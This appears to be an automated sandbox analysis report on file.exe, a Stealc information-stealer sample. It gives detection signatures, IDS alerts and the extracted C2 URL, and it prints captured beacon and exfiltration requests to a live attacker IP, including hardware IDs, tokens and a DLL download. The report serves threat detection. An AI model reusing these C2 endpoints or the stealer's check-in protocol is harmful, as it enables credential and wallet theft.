Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1502494
MD5:	69a44afd5f25f695f1e1fe16abf56a39
SHA1:	16db1181ec4d54a1fe2aed1f25a0bd47d53cee72
SHA256:	7f7ab62446251c1fec500e70705d6840c982351dfd8303e0ca5ddf0e40c2f6fc
Tags:	exe
Infos:

Detection

Stealc

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Stealc

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Hides threads from debuggers

Machine Learning detection for sample

PE file contains section with special chars

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal browser information (history, passwords, etc)

AV process strings found (often used to terminate AV products)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Downloads executable code via HTTP

Entry point lies outside standard sections

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 2800 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 69A44AFD5F25F695F1E1FE16ABF56A39)

WerFault.exe (PID: 1908 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2800 -s 1544 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.100/e2b1563c6670f193.php"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.2544618204.00000000008CA000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.2545709966.000000000136E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: file.exe PID: 2800	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: file.exe PID: 2800	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 2800	JoeSecurity_Stealc	Yara detected Stealc	Joe Security

Suricata Signatures

ET MALWARE Win32/Stealc Requesting plugins Config from C2 - Source IP: 192.168.2.4 - Destination IP: 185.215.113.100

Timestamp:	2024-09-01T23:02:56.268443+0200
SID:	2044246
Severity:	1
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Win32/Stealc Requesting browsers Config from C2 - Source IP: 192.168.2.4 - Destination IP: 185.215.113.100

Timestamp:	2024-09-01T23:02:55.982267+0200
SID:	2044244
Severity:	1
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Win32/Stealc Submitting System Information to C2 - Source IP: 192.168.2.4 - Destination IP: 185.215.113.100

Timestamp:	2024-09-01T23:02:58.882814+0200
SID:	2044248
Severity:	1
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config - Source IP: 185.215.113.100 - Destination IP: 192.168.2.4

Timestamp:	2024-09-01T23:02:55.988260+0200
SID:	2044245
Severity:	1
Source Port:	80
Destination Port:	49730
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in - Source IP: 192.168.2.4 - Destination IP: 185.215.113.100

Timestamp:	2024-09-01T23:02:55.694309+0200
SID:	2044243
Severity:	1
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config - Source IP: 185.215.113.100 - Destination IP: 192.168.2.4

Timestamp:	2024-09-01T23:02:56.275329+0200
SID:	2044247
Severity:	1
Source Port:	80
Destination Port:	49730
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.4 - Destination IP: 185.215.113.100

Timestamp:	2024-09-01T23:02:59.442106+0200
SID:	2803304
Severity:	3
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://185.215.113.100/e2b1563c6670f193.php	URL Reputation: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.php	URL Reputation: Label: malware
Source: http://185.215.113.100/0d60be0de163924d/sqlite3.dll	URL Reputation: Label: malware
Source: http://185.215.113.100	URL Reputation: Label: malware
Source: http://185.215.113.100/	URL Reputation: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.phpi	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/0d60be0de163924d/sqlite3.dllk.	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/0d60be0de163924d/sqlite3.dllK	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.phpo	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.phpU	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.phpion:	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.phpser	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.phpZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZ	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.php9	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.phpinit.exe	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/0d60be0de163924d/sqlite3.dll1563c6670f193.php1_	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.php&	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.phpf	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000000.00000002.2544618204.00000000008CA000.00000040.00000001.01000000.00000003.sdmp

Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.100/e2b1563c6670f193.php"}

Multi AV Scanner detection for domain / URL

Source: http://185.215.113.100/e2b1563c6670f193.phpo	Virustotal: Detection: 7%	Perma Link
Source: http://185.215.113.100/e2b1563c6670f193.phpi	Virustotal: Detection: 8%	Perma Link
Source: http://185.215.113.100/0d60be0de163924d/sqlite3.dllK	Virustotal: Detection: 10%	Perma Link
Source: http://185.215.113.100/e2b1563c6670f193.phpion:	Virustotal: Detection: 6%	Perma Link
Source: http://185.215.113.100/e2b1563c6670f193.phpser	Virustotal: Detection: 17%	Perma Link
Source: http://185.215.113.100/e2b1563c6670f193.phpU	Virustotal: Detection: 10%	Perma Link
Source: http://185.215.113.100/e2b1563c6670f193.phpinit.exe	Virustotal: Detection: 17%	Perma Link
Source: http://185.215.113.100/e2b1563c6670f193.php9	Virustotal: Detection: 7%	Perma Link
Source: http://185.215.113.100/e2b1563c6670f193.php&	Virustotal: Detection: 8%	Perma Link
Source: http://185.215.113.100/e2b1563c6670f193.phpf	Virustotal: Detection: 7%	Perma Link
Source: http://185.215.113.100/e2b1563c6670f193.phpZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZ	Virustotal: Detection: 15%	Perma Link

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 36%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.100:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49730 -> 185.215.113.100:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.100:80 -> 192.168.2.4:49730
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49730 -> 185.215.113.100:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.100:80 -> 192.168.2.4:49730
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49730 -> 185.215.113.100:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://185.215.113.100/e2b1563c6670f193.php

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 01 Sep 2024 21:02:59 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.100Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKEGHDGHCGHDHJKFBFBKHost: 185.215.113.100Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 47 48 44 47 48 43 47 48 44 48 4a 4b 46 42 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 42 44 31 42 43 38 36 46 36 37 31 33 36 30 34 32 39 36 32 39 37 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 47 48 44 47 48 43 47 48 44 48 4a 4b 46 42 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6c 65 76 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 47 48 44 47 48 43 47 48 44 48 4a 4b 46 42 46 42 4b 2d 2d 0d 0a Data Ascii: ------JKEGHDGHCGHDHJKFBFBKContent-Disposition: form-data; name="hwid"7BD1BC86F6713604296297------JKEGHDGHCGHDHJKFBFBKContent-Disposition: form-data; name="build"leva------JKEGHDGHCGHDHJKFBFBK--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAFCFBAEGDHIEBFHDGCBHost: 185.215.113.100Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 46 43 46 42 41 45 47 44 48 49 45 42 46 48 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 36 38 39 37 64 38 39 36 32 36 61 35 38 33 63 31 30 33 64 65 33 64 35 39 37 34 62 62 35 62 61 32 30 36 34 32 63 66 31 32 64 31 37 64 37 32 33 62 36 30 37 34 39 38 64 30 65 39 38 36 35 34 32 37 35 33 61 38 32 37 35 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 43 46 42 41 45 47 44 48 49 45 42 46 48 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 43 46 42 41 45 47 44 48 49 45 42 46 48 44 47 43 42 2d 2d 0d 0a Data Ascii: ------BAFCFBAEGDHIEBFHDGCBContent-Disposition: form-data; name="token"36897d89626a583c103de3d5974bb5ba20642cf12d17d723b607498d0e986542753a8275------BAFCFBAEGDHIEBFHDGCBContent-Disposition: form-data; name="message"browsers------BAFCFBAEGDHIEBFHDGCB--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKFCFBKFCFBFIDGCGDHJHost: 185.215.113.100Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 46 43 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 36 38 39 37 64 38 39 36 32 36 61 35 38 33 63 31 30 33 64 65 33 64 35 39 37 34 62 62 35 62 61 32 30 36 34 32 63 66 31 32 64 31 37 64 37 32 33 62 36 30 37 34 39 38 64 30 65 39 38 36 35 34 32 37 35 33 61 38 32 37 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 43 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 43 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 2d 2d 0d 0a Data Ascii: ------KKFCFBKFCFBFIDGCGDHJContent-Disposition: form-data; name="token"36897d89626a583c103de3d5974bb5ba20642cf12d17d723b607498d0e986542753a8275------KKFCFBKFCFBFIDGCGDHJContent-Disposition: form-data; name="message"plugins------KKFCFBKFCFBFIDGCGDHJ--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIEGCBKEGCFCBFIDBFIIHost: 185.215.113.100Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 45 47 43 42 4b 45 47 43 46 43 42 46 49 44 42 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 36 38 39 37 64 38 39 36 32 36 61 35 38 33 63 31 30 33 64 65 33 64 35 39 37 34 62 62 35 62 61 32 30 36 34 32 63 66 31 32 64 31 37 64 37 32 33 62 36 30 37 34 39 38 64 30 65 39 38 36 35 34 32 37 35 33 61 38 32 37 35 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 47 43 42 4b 45 47 43 46 43 42 46 49 44 42 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 47 43 42 4b 45 47 43 46 43 42 46 49 44 42 46 49 49 2d 2d 0d 0a Data Ascii: ------FIEGCBKEGCFCBFIDBFIIContent-Disposition: form-data; name="token"36897d89626a583c103de3d5974bb5ba20642cf12d17d723b607498d0e986542753a8275------FIEGCBKEGCFCBFIDBFIIContent-Disposition: form-data; name="message"fplugins------FIEGCBKEGCFCBFIDBFII--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIDHJKFBGIIJJKFIJDBGHost: 185.215.113.100Content-Length: 5727Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.100Cache-Control: no-cache

Source: Joe Sandbox View

IP Address: 185.215.113.100 185.215.113.100

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: Network traffic

Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49730 -> 185.215.113.100:80

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.100Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.100Cache-Control: no-cache

Source: unknown

HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKEGHDGHCGHDHJKFBFBKHost: 185.215.113.100Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 47 48 44 47 48 43 47 48 44 48 4a 4b 46 42 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 42 44 31 42 43 38 36 46 36 37 31 33 36 30 34 32 39 36 32 39 37 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 47 48 44 47 48 43 47 48 44 48 4a 4b 46 42 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6c 65 76 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 47 48 44 47 48 43 47 48 44 48 4a 4b 46 42 46 42 4b 2d 2d 0d 0a Data Ascii: ------JKEGHDGHCGHDHJKFBFBKContent-Disposition: form-data; name="hwid"7BD1BC86F6713604296297------JKEGHDGHCGHDHJKFBFBKContent-Disposition: form-data; name="build"leva------JKEGHDGHCGHDHJKFBFBK--

Source: file.exe, 00000000.00000002.2545709966.00000000013E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.1
Source: file.exe, 00000000.00000002.2544618204.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2544618204.0000000000861000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2544618204.000000000089C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2545709966.000000000136E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100
Source: file.exe, 00000000.00000002.2545709966.00000000013C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/
Source: file.exe, 00000000.00000002.2545709966.00000000013E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2544618204.00000000008CA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.100/0d60be0de163924d/sqlite3.dll
Source: file.exe, 00000000.00000002.2545709966.00000000013E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/0d60be0de163924d/sqlite3.dll1563c6670f193.php1_
Source: file.exe, 00000000.00000002.2545709966.00000000013C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/0d60be0de163924d/sqlite3.dllK
Source: file.exe, 00000000.00000002.2545709966.00000000013C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/0d60be0de163924d/sqlite3.dllk.
